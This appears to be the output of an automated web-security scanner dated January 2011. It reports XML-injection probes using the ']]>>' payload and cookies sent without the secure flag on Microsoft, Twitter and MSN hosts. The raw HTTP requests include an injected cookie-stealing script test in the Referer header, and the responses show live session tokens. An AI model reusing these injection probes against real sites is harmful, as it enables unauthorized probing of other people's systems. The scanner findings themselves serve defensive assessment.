The responseEncoding parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the responseEncoding parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /resource.aspx?resources=gallery&gmts=gmt&mkt=&configCsid=MSNmoney&configName=money-gallery-v2-site-wide&responseEncoding=json]]>>&callbackName=Msn.Video.JavascriptApi.onComplete&cd=0 HTTP/1.1 Host: img.widgets.video.s-msn.com Proxy-Connection: keep-alive Referer: http://money.redacted//?4ae1b Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: public, max-age=1800 Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Age: 2 Date: Sun, 30 Jan 2011 19:38:33 GMT Last-Modified: Sun, 30 Jan 2011 19:38:32 GMT Expires: Sun, 30 Jan 2011 20:08:31 GMT Connection: keep-alive Content-Length: 11430
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /anywhere.js]]>>?v=1&id= HTTP/1.1 Host: platform.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=43838368.lang%3A%20en; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296232506.1296314194.3; k=173.193.214.243.1296227675375304;
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sun, 30 Jan 2011 02:17:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets]]>>/tweet_button.html?_=1296391709300&count=horizontal&lang=en&related=breakingnews%3AThe%20fastest%20breaking%20news%20on%20Twitter.&text=Lawrence%3A%20'Palin's%20stock%20cannot%20go%20up'&url=http%3A%2F%2Fthelastword.msnbc.redacted%2F_news%2F2011%2F01%2F28%2F5941104-lawrence-palins-stock-cannot-go-up&via=thelastword HTTP/1.1 Host: platform0.twitter.com Proxy-Connection: keep-alive Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296232506.1296314194.3; __utmv=43838368.lang%3A%20en
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sun, 30 Jan 2011 19:59:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets/tweet_button.html]]>>?_=1296391709300&count=horizontal&lang=en&related=breakingnews%3AThe%20fastest%20breaking%20news%20on%20Twitter.&text=Lawrence%3A%20'Palin's%20stock%20cannot%20go%20up'&url=http%3A%2F%2Fthelastword.msnbc.redacted%2F_news%2F2011%2F01%2F28%2F5941104-lawrence-palins-stock-cannot-go-up&via=thelastword HTTP/1.1 Host: platform0.twitter.com Proxy-Connection: keep-alive Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296232506.1296314194.3; __utmv=43838368.lang%3A%20en
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sun, 30 Jan 2011 19:59:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The lmif parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the lmif parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /LoginStage.aspx?lmif=1000]]>>&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1 Host: security.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /QuoteService/dynamic?format=json]]>>&symbol= HTTP/1.1 Host: services.money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:19:07 GMT Connection: close Content-Length: 51
The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /quoteservice/streaming?format=json]]>>&symbol= HTTP/1.1 Host: services.money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:19:09 GMT Connection: close Content-Length: 51
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pix]]>>/master_pixel.js HTTP/1.1 Host: srv.admailtiser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2;
Response
HTTP/1.0 404 Not Found x-amz-request-id: 0961C9CA9A5345B1 x-amz-id-2: hLB+PJXuytjuMcgNsKJJYZgMfWLZTB79WR/JkxL6UakMRmJ4dBgqA0aC3NC5b6be Content-Type: application/xml Date: Sun, 30 Jan 2011 02:19:28 GMT Server: AmazonS3 Age: 1 Content-Length: 288 X-Cache: Error from cloudfront X-Amz-Cf-Id: 832ca13cd8d1a57caa5aeda99dfa54eeb25be5d7529fff10d1ba00e12b1e100bd766d00b0203de38 Via: 1.0 de8307e7de3620df506484cdd13a4606.cloudfront.net:11180 (CloudFront), 1.0 c3dbce96ffc5d90223789659f3b896a1.cloudfront.net:11180 (CloudFront) Connection: close
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>pix]]>>/master_pixel.js</Key><RequestId>0961C9CA9A5345B1</RequestId>< ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pix/master_pixel.js]]>> HTTP/1.1 Host: srv.admailtiser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2;
Response
HTTP/1.0 404 Not Found x-amz-request-id: EE3EF78EC3A56325 x-amz-id-2: tn3j7/pY3zUPy2FZhprUHOFaNaN7Z7j0mX6mlU1O82AMVunyu0q2Xr82FNiy3M4J Content-Type: application/xml Date: Sun, 30 Jan 2011 02:19:31 GMT Server: AmazonS3 Content-Length: 288 X-Cache: Error from cloudfront X-Amz-Cf-Id: e3e74461d12e8c1e0ec2857ffc0cd2715d7227c456be284ad14176c3ac6a859a9c55fcf9b6eb1e40 Via: 1.0 7968d93e1fd68721fd2c757c85758124.cloudfront.net:11180 (CloudFront), 1.0 c3dbce96ffc5d90223789659f3b896a1.cloudfront.net:11180 (CloudFront) Connection: close
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>pix/master_pixel.js]]>></Key><RequestId>EE3EF78EC3A56325</RequestId>< ...[SNIP]...
10. SSL cookie without secure flag setpreviousnext There are 26 instances of this issue:
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: careers.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://careers.microsoft.com/gclp.aspx Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=imfrgsjgkicnzcjt42531kjd; path=/; HttpOnly Set-Cookie: ASP.NET_SessionId=h2kb0f3zzbexr4550xzpoczx; path=/; HttpOnly Set-Cookie: SessionProfile=imfrgsjgkicnzcjt42531kjd; path=/; secure X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Date: Sat, 29 Jan 2011 23:45:40 GMT Connection: close Content-Length: 155
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://careers.microsoft.com/gclp.aspx">here</a>.</h2> </body></html>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1 Host: login.silverlight.net Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:25 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:25 GMT Content-Length: 9085
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1 Host: login.silverlight.net Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card.asp?time1= HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDSABQACCS=EBBIKHPBAPMOLLILHIAIEMFN; path=/ Date: Sun, 30 Jan 2011 01:37:11 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/o.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDSABQACCS=LHLFKHPBAJOOIDHFICBAPGEC; path=/ Date: Sat, 29 Jan 2011 23:50:47 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/o.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDSCDTCACS=DPCFIDMCHKHICEPBPALEFKKC; path=/ Date: Sun, 30 Jan 2011 16:57:26 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1 Host: security.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /LoginStage.aspx HTTP/1.1 Host: security.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ToddKenreck HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:03:01 GMT Server: hi Status: 200 OK X-Transaction: 1296356581-64489-22662 ETag: "64fd45f3d163ffe5f3eb5309c6bbafbb" Last-Modified: Sun, 30 Jan 2011 03:03:01 GMT X-Runtime: 0.01332 Content-Type: text/html; charset=utf-8 Content-Length: 38284 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com Set-Cookie: guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /perseus/se.ashx HTTP/1.1 Host: www.msnfeedback.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 30 Jan 2011 01:58:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /perseus/se.htm Set-Cookie: ASP.NET_SessionId=so3zhbfsyas5riuwao00fhn1; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 132
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/perseus/se.htm'>here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US HTTP/1.1 Host: login.live.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; xidseq=1; mktstate=S=821848180&U=&E=&P=&B=en-us; mkt1=norm=en-us; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; wla42=
Response
HTTP/1.1 200 OK Cache-Control: no-cache Connection: close Date: Sat, 29 Jan 2011 23:12:17 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:11:17 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H55 V: 0 P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1 X-Frame-Options: deny Vary: Accept-Encoding Content-Length: 13981
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pp900/ HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:13:14 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H36 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:12:14 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPRequ=lt=1296342794&co=1&id=N; path=/;version=1 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4c2d8b39-4613-4bc8-bb07-53657b3f42ca; path=/;version=1 X-Frame-Options: deny Content-Length: 11416
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ppsecure/post.srf HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:13:14 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H52 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:12:14 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-df41315e-45c6-4d60-b893-881795a1cb21; path=/;version=1 X-Frame-Options: deny Content-Length: 11450
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ppsecure/secure.srf HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:13:16 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H45 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:12:16 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPRequ=lt=1296342796&co=1&id=N; path=/;version=1 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-23efde8d-b534-4b63-8d36-38dc6e68d0f0; path=/;version=1 X-Frame-Options: deny Content-Length: 11444
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
